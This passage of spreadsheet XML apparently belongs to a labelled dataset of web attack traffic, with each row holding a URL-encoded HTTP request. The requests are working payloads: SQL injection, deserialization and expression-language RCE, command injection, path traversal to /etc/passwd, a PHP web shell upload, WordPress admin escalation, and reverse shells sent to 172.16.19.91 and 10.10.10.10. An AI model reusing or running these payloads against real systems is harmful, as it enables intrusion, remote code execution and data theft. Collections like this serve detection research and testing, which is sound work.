FkVG9FbmQoKSkpJzskcy5Vc2VTaGVsbEV4ZWN1dGU9JGZhbHNlOyRzLlJlZGlyZWN0U3RhbmRhcmRPdXRwdXQ9JHRydWU7JHMuV2luZG93U3R5bGU9J0hpZGRlbic7JHMuQ3JlYXRlTm9XaW5kb3c9JHRydWU7JHA9W1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzXTo6U3RhcnQoJHMpOyI%253d%2522%2529%2529%257d%2529%2527%2529</v>
      </c>
    </row>
    <row r="55" spans="1:4" ht="23.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A55" s="2" t="s">
        <v>115</v>
      </c>
      <c r="B55" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C55" t="s">
        <v>166</v>
      </c>
      <c r="D55" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2Fvulnerabilities%2Fsqli_blind%2F%3Fid%3D1%2529%2528SELECT%2520%2528CASE%2520WHEN%2520%25283701%253D3701%2529%2520THEN%2520REGEXP_SUBSTRING%2528REPEAT%2528LEFT%2528CRYPT_KEY%2528CHAR%252865%2529%257C%257CCHAR%252869%2529%257C%257CCHAR%252883%2529%252CNULL%2529%252C0%2529%252C500000000%2529%252CNULL%2529%2520ELSE%2520CHAR%2528106%2529%257C%257CCHAR%252898%2529%257C%257CCHAR%2528102%2529%257C%257CCHAR%252878%2529%2520END%2529%2520FROM%2520%2528VALUES%25280%2529%2529%2529--%2520PRkX%26Submit%3DSubmit%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_9_2%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F52.0.2762.73%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="56" spans="1:4" ht="23.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A56" s="2" t="s">
        <v>113</v>
      </c>
      <c r="B56" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C56" t="s">
        <v>167</v>
      </c>
      <c r="D56" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2Fvulnerabilities%2Fsqli_blind%2F%3Fid%3D1%2529%2520AND%2520CHAR%2528104%2529%257C%257CCHAR%252872%2529%257C%257CCHAR%2528106%2529%257C%257CCHAR%252899%2529%253DREGEXP_SUBSTRING%2528REPEAT%2528RIGHT%2528CHAR%25286161%2529%252C0%2529%252C5000000000%2529%252CNULL%2529--%2520fVrS%26Submit%3DSubmit%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_9_3%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F35.0.1916.47%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="57" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A57" s="2" t="s">
        <v>112</v>
      </c>
      <c r="B57" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C57" t="s">
        <v>168</v>
      </c>
      <c r="D57" t="str">
        <f t="shared" si="0"/>
        <v>POST%20%2FFactoryTalkLogReader%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20WOW64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F89.0.4389.114%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%201338%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Foctet-stream%0A%0A......................%29System.Security.Principal.WindowsIdentity....%24System.Security.ClaimsIdentity.actor.......%09AAEAAAD%2F%2F%2F%2F%2FAQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAAtgU8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI%2FPg0KPE9iamVjdERhdGFQcm92aWRlciBNZXRob2ROYW1lPSJTdGFydCIgSXNJbml0aWFsTG9hZEVuYWJsZWQ9IkZhbHNlIiB4bWxucz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwvcHJlc2VudGF0aW9uIiB4bWxuczpzZD0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uRGlhZ25vc3RpY3M7YXNzZW1ibHk9U3lzdGVtIiB4bWxuczp4PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbCI%2BDQogIDxPYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U%2BDQogICAgPHNkOlByb2Nlc3M%2BDQogICAgICA8c2Q6UHJvY2Vzcy5TdGFydEluZm8%2BDQogICAgICAgIDxzZDpQcm9jZXNzU3RhcnRJbmZvIEFyZ3VtZW50cz0iL2MgY2FsYy5leGUiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M%2BDQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI%2BCw%3D%3D.</v>
      </c>
    </row>
    <row r="58" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A58" s="2" t="s">
        <v>111</v>
      </c>
      <c r="B58" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C58" t="s">
        <v>169</v>
      </c>
      <c r="D58" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2F.git%2Fconfig%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.2%3B%20WOW64%29%20AppleWebKit%2F537.36%20%28KHTML%20like%20Gecko%29%20Chrome%2F44.0.2403.155%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="59" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A59" s="2" t="s">
        <v>110</v>
      </c>
      <c r="B59" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C59" t="s">
        <v>170</v>
      </c>
      <c r="D59" t="str">
        <f t="shared" si="0"/>
        <v>POST%20%2FHNAP1%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F36.0.1985.67%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%2071%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fjson%0AHnap_auth%3A%2084E9E7AB41420A00EC4C179066EAF998%201646491157369%0ASoapaction%3A%20%22http%3A%2F%2Fpurenetworks.com%2FHNAP1%2FSetNTPServerSettings%22%0A%0A%7B%22SetNTPServerSettings%22%3A%7B%22system_time_timezone%22%3A%22%24%28ls%20%3E%20%2Fwww%2Fweb%2Fls%29%22%7D%7D</v>
      </c>
    </row>
    <row r="60" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A60" s="2" t="s">
        <v>109</v>
      </c>
      <c r="B60" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C60" t="s">
        <v>171</v>
      </c>
      <c r="D60" t="str">
        <f t="shared" si="0"/>
        <v>POST%20%2Fwp-admin%2Fadmin-ajax.php%3Faction%3Dstm_lms_register%26nonce%3D%5BNONCE%5D%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.3%3B%20WOW64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2225.0%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20325%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fjson%0AX-Requested-With%3A%20XMLHttpRequest%0A%0A%7B%22user_login%22%3A%22USERNAME%22%2C%22user_email%22%3A%22EMAIL%40TLD%22%2C%22user_password%22%3A%22PASSWORD%22%2C%22user_password_re%22%3A%22PASSWORD%22%2C%22become_instructor%22%3A%22%22%2C%22privacy_policy%22%3Atrue%2C%22degree%22%3A%22%22%2C%22expertize%22%3A%22%22%2C%22auditory%22%3A%22%22%2C%22additional%22%3A%5B%5D%2C%22additional_instructors%22%3A%5B%5D%2C%22profile_default_fields_for_register%22%3A%7B%22wp_capabilities%22%3A%7B%22value%22%3A%7B%22administrator%22%3A1%7D%7D%7D%7D</v>
      </c>
    </row>
    <row r="61" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A61" s="2" t="s">
        <v>108</v>
      </c>
      <c r="B61" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C61" t="s">
        <v>172</v>
      </c>
      <c r="D61" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2Fimc%2Ficc%2Ftaskmng%2FviewBatchTaskResultDetailFact.xhtml%3B.jar%3FqueryType%3D1%26beanName%3DfacesContext.getClass%2528%2529.getClassLoader%2528%2529.getSystemClassLoader%2528%2529.loadClass%2528%2522javax.script.%2522.concat%2528%2522ScriptEngineManager%2522%2529%2529.newInstance%2528%2529.getEngineByName%2528%2522js%2522%2529.eval%2528%2522java.lang.Runtime.getRuntime%2528%2529.exec%2528%255C%2522calc%255C%2522%2529%2522%2529%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%2010.0%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F40.0.2214.93%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="62" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A62" s="2" t="s">
        <v>107</v>
      </c>
      <c r="B62" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C62" t="s">
        <v>255</v>
      </c>
      <c r="D62" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2F%2Flinuxki%2Fexperimental%2Fvis%2Fkivis.php%3Ftype%3Dkitrace%26pid%3D15%3Becho%2520BEGIN%3B%2525s%3Becho%2520END%3B%20HTTP%2F1.1%0AHost%3A%2010.66.245.125%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%3B%20rv%3A76.0%29%20Gecko%2F20100101%20Firefox%2F76.0%0AAccept%3A%20text%2Fhtml%2Capplication%2Fxhtml%2Bxml%2Capplication%2Fxml%3Bq%3D0.9%2Cimage%2Fwebp%2C%2A%2F%2A%3Bq%3D0.8%0AAccept-Language%3A%20zh-CN%2Czh%3Bq%3D0.8%2Czh-TW%3Bq%3D0.7%2Czh-HK%3Bq%3D0.5%2Cen-US%3Bq%3D0.3%2Cen%3Bq%3D0.2%0AAccept-Encoding%3A%20gzip%2C%20deflate%0AConnection%3A%20keep-alive%0AReferer%3A%20http%3A%2F%2F10.66.245.125%2F%2Flinuxki%2Fexperimental%2Fvis%2Fkivis.php%3Ftype%3Dkitrace%26pid%3D15%3Becho%2520BEGIN%3B%2525s%3Becho%2520END%3B%0ACookie%3A%2078nh_2132_saltkey%3DmDoEHu44%3B%2078nh_2132_lastvisit%3D1590391575%3B%2078nh_2132_sid%3DG675wu%3B%2078nh_2132_lastact%3D1590396306%2509index.php%2509%0AUpgrade-Insecure-Requests%3A%201%0A</v>
      </c>
    </row>
    <row r="63" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A63" s="2" t="s">
        <v>106</v>
      </c>
      <c r="B63" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C63" t="s">
        <v>173</v>
      </c>
      <c r="D63" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2Fadmin%2Findex.php%3Fmodule%3Dfile_editor%26file%3D%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%205.1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F35.0.3319.102%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="64" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A64" s="2" t="s">
        <v>105</v>
      </c>
      <c r="B64" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C64" t="s">
        <v>174</v>
      </c>
      <c r="D64" t="str">
        <f t="shared" si="0"/>
        <v>POST%20%2F_search%3Fpretty%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28X11%3B%20Linux%20x86_64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F34.0.1847.137%20Safari%2F4E423F%0AConnection%3A%20close%0AContent-Length%3A%20356%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0A%0A%7B%0A%20%20%20%20%22size%22%3A%201%2C%0A%20%20%20%20%22query%22%3A%20%7B%0A%20%20%20%20%20%20%22filtered%22%3A%20%7B%0A%20%20%20%20%20%20%20%20%22query%22%3A%20%7B%0A%20%20%20%20%20%20%20%20%20%20%22match_all%22%3A%20%7B%0A%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%2C%0A%20%20%20%20%22script_fields%22%3A%20%7B%0A%20%20%20%20%20%20%20%20%22command%22%3A%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%22script%22%3A%20%22import%20java.io.%2A%3Bnew%20java.util.Scanner%28Runtime.getRuntime%28%29.exec%28%5C%22id%5C%22%29.getInputStream%28%29%29.useDelimiter%28%5C%22%5C%5C%5C%5CA%5C%22%29.next%28%29%3B%22%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%7D</v>
      </c>
    </row>
    <row r="65" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A65" s="2" t="s">
        <v>34</v>
      </c>
      <c r="B65" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C65" t="s">
        <v>175</v>
      </c>
      <c r="D65" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2FsqLServer%2FSeArcH%2FsEarch.AsP%3Fname%3D1%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.3%3B%20WOW64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2226.0%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="66" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A66" s="2" t="s">
        <v>104</v>
      </c>
      <c r="B66" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C66" t="s">
        <v>176</v>
      </c>
      <c r="D66" t="str">
        <f t="shared" si="0"/>
        <v>POST%20%2Frest%2Ffabrics%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.3%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F37.0.2049.0%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20428%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fjson%0A%0A%7B%22generalSetting%22%3A%20%7B%22provisionOption%22%3A%20%22Manual%22%2C%20%22asn%22%3A%20%221337%22%7D%2C%20%22name%22%3A%20%22svpflyxm%5C%22%3B%27%60%7Bruby%2C-rsocket%2C-e%27c%3DTCPSocket.new%28%5C%22172.16.19.91%5C%22%2C%5C%221337%5C%22%29%3Bwhile%28cmd%3Dc.gets%29%3BIO.popen%28cmd%2C%5C%22r%5C%22%29%7B%7Cio%7Cc.print%28io.read%29%7Dend%27%7D%60%27%5C%22%22%2C%20%22provisionSetting%22%3A%20%7B%22amqpSetting%22%3A%20%7B%22server%22%3A%20%22127.0.0.1%3A1337%22%7D%2C%20%22dhcpSetting%22%3A%20%7B%22primarySubnet%22%3A%20%22127.0.0.1%22%2C%20%22primaryDNS%22%3A%20%22127.0.0.1%22%2C%20%22secondaryDNS%22%3A%20%22127.0.0.1%22%7D%2C%20%22ldapSetting%22%3A%20%7B%22server%22%3A%20%22127.0.0.1%22%7D%7D%7D</v>
      </c>
    </row>
    <row r="67" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A67" s="2" t="s">
        <v>103</v>
      </c>
      <c r="B67" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C67" t="s">
        <v>262</v>
      </c>
      <c r="D67" t="str">
        <f t="shared" ref="D67:D130" si="1">_xlfn.ENCODEURL(C67)</f>
        <v>GET%20%2Fcheck_community.php%3Fcommunity%3D1%27%20AND%20%28SELECT%206941%20FROM%20%28SELECT%28SLEEP%2810%29%29%29Qaxg%29%20AND%20%27sdHI%27%3D%27sdHI%20HTTP%2F1.1%0AHost%3A%20192.168.18.71%0ACache-Control%3A%20max-age%3D0%0AUpgrade-Insecure-Requests%3A%201%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F83.0.4103.61%20Safari%2F537.36%0AAccept%3A%20text%2Fhtml%2Capplication%2Fxhtml%2Bxml%2Capplication%2Fxml%3Bq%3D0.9%2Cimage%2Fwebp%2Cimage%2Fapng%2C%2A%2F%2A%3Bq%3D0.8%2Capplication%2Fsigned-exchange%3Bv%3Db3%3Bq%3D0.9%0AReferer%3A%20http%3A%2F%2F192.168.18.71%2Fxinge%2Flogin_page.php%0AAccept-Language%3A%20zh-CN%2Czh%3Bq%3D0.9%0ACookie%3A%20PHPSESSID%3D4a6arunmnkjn5bc77kqefqcao2%0AConnection%3A%20close%0A</v>
      </c>
    </row>
    <row r="68" spans="1:4" ht="23.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A68" s="2" t="s">
        <v>102</v>
      </c>
      <c r="B68" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C68" t="s">
        <v>261</v>
      </c>
      <c r="D68" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2Fapps%2Fzealot%2Fipszealot%2Fsavepcap%2F24535%20HTTP%2F1.1%0AHost%3A%20rules.intra.nsfocus.com%0AConnection%3A%20keep-alive%0AContent-Length%3A%20289%0AAccept%3A%20%2A%2F%2A%0AOrigin%3A%20http%3A%2F%2Frules.intra.nsfocus.com%0AX-Requested-With%3A%20XMLHttpRequest%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F78.0.3904.87%20Safari%2F537.36%0AContent-Type%3A%20multipart%2Fform-data%3B%20boundary%3D----WebKitFormBoundaryexJikj3YU29aziBL%0AReferer%3A%20http%3A%2F%2Frules.intra.nsfocus.com%2Fapps%2Fzealot%2Fipszealot%2Fuploadpcap%2F24535%0AAccept-Encoding%3A%20gzip%2C%20deflate%0AAccept-Language%3A%20zh-CN%2Czh%3Bq%3D0.9%2Cen%3Bq%3D0.8%2Czh-TW%3Bq%3D0.7%0ACookie%3A%20tvrsid%3Duw7dyzdy9zqt6wxoyah90av0z30jyly8%3B%20top_menustatue_NSFOCUS%20%E5%A8%81%E8%83%81%E5%93%8D%E5%BA%94%E5%92%8C%E4%BA%A7%E5%93%81%E8%A7%84%E5%88%99%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%3D1%2C3%2C3%0A%0A------WebKitFormBoundaryexJikj3YU29aziBL%0AContent-Disposition%3A%20form-data%3B%20name%3D%22pcap%22%3B%20filename%3D%222020-8840.json%22%0AContent-Type%3A%20application%2Fjson%0A%0A%5B%22org.apache.xbean.propertyeditor.JndiConverter%22%2C%20%7B%22asText%22%3A%22rmi%3A%2F%2F127.0.0.1%3A1099%2FExploitMac%22%7D%5D%0A------WebKitFormBoundaryexJikj3YU29aziBL--</v>
      </c>
    </row>
    <row r="69" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A69" s="2" t="s">
        <v>101</v>
      </c>
      <c r="B69" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C69" t="s">
        <v>177</v>
      </c>
      <c r="D69" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2Falsdfjiasdlkamalskdf.html%253fasdflkaijfaldjflaskfoeialsdfkaj%3D%2F..%2Fsqlserver%2Fsearch%2Fsearch.asp%3Fname%3D1%2520or%25201%3D1%2520--%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%205.1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F34.0.1866.237%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="70" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A70" s="2" t="s">
        <v>100</v>
      </c>
      <c r="B70" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C70" t="s">
        <v>178</v>
      </c>
      <c r="D70" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2Fispirit%2Finterface%2Fgateway.php%3Fjson%3D%257B%2522url%2522%3A%2522general%2Fattachment%2Fshell.php.png%2522%257D%26cmd%3Decho%2520bash%2520-i%2520%253E%26%2520%2Fdev%2Ftcp%2F10.10.10.10%2F9001%25200%253E%261%3B%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_9_3%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F35.0.1916.47%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="71" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A71" s="2" t="s">
        <v>99</v>
      </c>
      <c r="B71" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C71" t="s">
        <v>179</v>
      </c>
      <c r="D71" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2Fmain.php%3Fsessid%3D6ca89212aceb7b4b6997d3b1b4b9eaf0%26act%3Dnetdisk%26opt%3Ddownload%26ftpfolder%3DLw%253D%253D%26filename%3DcGhwaW5mby5waHA%253D%26retid%3D33938934%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28X11%3B%20OpenBSD%20i386%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F36.0.1985.125%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0AProxy-Connection%3A%20keep-alive%0A</v>
      </c>
    </row>
    <row r="72" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A72" s="2" t="s">
        <v>98</v>
      </c>
      <c r="B72" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C72" t="s">
        <v>242</v>
      </c>
      <c r="D72" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2F%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28X11%3B%20Linux%20x86_64%3B%20rv%3A91.0%29%20Gecko%2F20100101%20Firefox%2F91.0%0AAccept%3A%20text%2Fhtml%2Capplication%2Fxhtml%2Bxml%2Capplication%2Fxml%3Bq%3D0.9%2Cimage%2Fwebp%2C%2A%2F%2A%3Bq%3D0.8%0AAccept-Language%3A%20zh-CN%2Czh%3Bq%3D0.8%2Czh-TW%3Bq%3D0.7%2Czh-HK%3Bq%3D0.5%2Cen-US%3Bq%3D0.3%2Cen%3Bq%3D0.2%0AAccept-Encoding%3A%20gzip%2C%20deflate%0AContent-Type%3A%20multipart%2Fform-data%3B%20boundary%3D---------------------------201625008418654028163691115891%0AContent-Length%3A%20253%0AOrigin%3A%20http%3A%2F%2F192.168.248.133%3A8080%0AConnection%3A%20close%0AReferer%3A%20http%3A%2F%2F192.168.248.133%3A8080%2F%0ACookie%3A%20PHPSESSIDCV%3D5Tte00Ga7WVlwh%252BZtuQR5A%253D%253D%3B%20javascript_enabled_detect%3D2%3B%20javascript_enabled%3D1694776959000%3B%20local_tz%3DAsia%252FShanghai%3B%20pma_lang%3Dzh_CN%0AUpgrade-Insecure-Requests%3A%201%0A%0A-----------------------------201625008418654028163691115891%0AContent-Disposition%3A%20form-data%3B%20name%3D%22file_upload%22%3B%20filename%3D%22a.jpg%20%22%0AContent-Type%3A%20image%2Fjpeg%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27a%27%5D%29%3B%3F%3E%0A%0A-----------------------------201625008418654028163691115891--</v>
      </c>
    </row>
    <row r="73" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A73" s="2" t="s">
        <v>97</v>
      </c>
      <c r="B73" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C73" t="s">
        <v>180</v>
      </c>
      <c r="D73" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2F%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.3%3B%20WOW64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2225.0%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20113%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0A%0Ahostname%3Dx%2B-oProxyCommand%253decho%2509ZWNobyAnSGVsbG8nPi90bXAvdGVzdA%253d%253d%7Cbase64%2509-d%7Csh%7D%26username%3D222%26password%3D333</v>
      </c>
    </row>
    <row r="74" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A74" s="2" t="s">
        <v>96</v>
      </c>
      <c r="B74" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C74" t="s">
        <v>181</v>
      </c>
      <c r="D74" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2Fjsrpc.php%3Foutput%3Djson-rpc%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.4%3B%20WOW64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2225.0%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20113%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fjson-rpc%0AX-Prototype-Version%3A%201.6.1%0AX-Requested-With%3A%20XMLHttpRequest%0A%0A%7B%22jsonrpc%22%3A%20%222.0%22%2C%20%22method%22%3A%20%22zabbix.status%22%2C%20%22params%22%3A%20%7B%7D%2C%20%22auth%22%3A%20%2270d34a4c6232f61e12024645de74242e%22%2C%20%22id%22%3A%2026%7D</v>
      </c>
    </row>
    <row r="75" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A75" s="2" t="s">
        <v>95</v>
      </c>
      <c r="B75" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C75" t="s">
        <v>182</v>
      </c>
      <c r="D75" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2Fcontext.json%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_10_1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F37.0.2062.124%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%201052%0AAccept-Encoding%3A%20identity%0A%0A%7B%0A%20%20%22personalizations%22%3A%5B%0A%20%20%20%20%7B%0A%20%20%20%20%20%20%22id%22%3A%22gender-test%22%2C%0A%20%20%20%20%20%20%22strategy%22%3A%22matching-first%22%2C%0A%20%20%20%20%20%20%22strategyOptions%22%3A%7B%0A%20%20%20%20%20%20%20%20%22fallback%22%3A%22var2%22%0A%20%20%20%20%20%20%7D%2C%0A%20%20%20%20%20%20%22contents%22%3A%5B%0A%20%20%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%20%20%22filters%22%3A%5B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%22condition%22%3A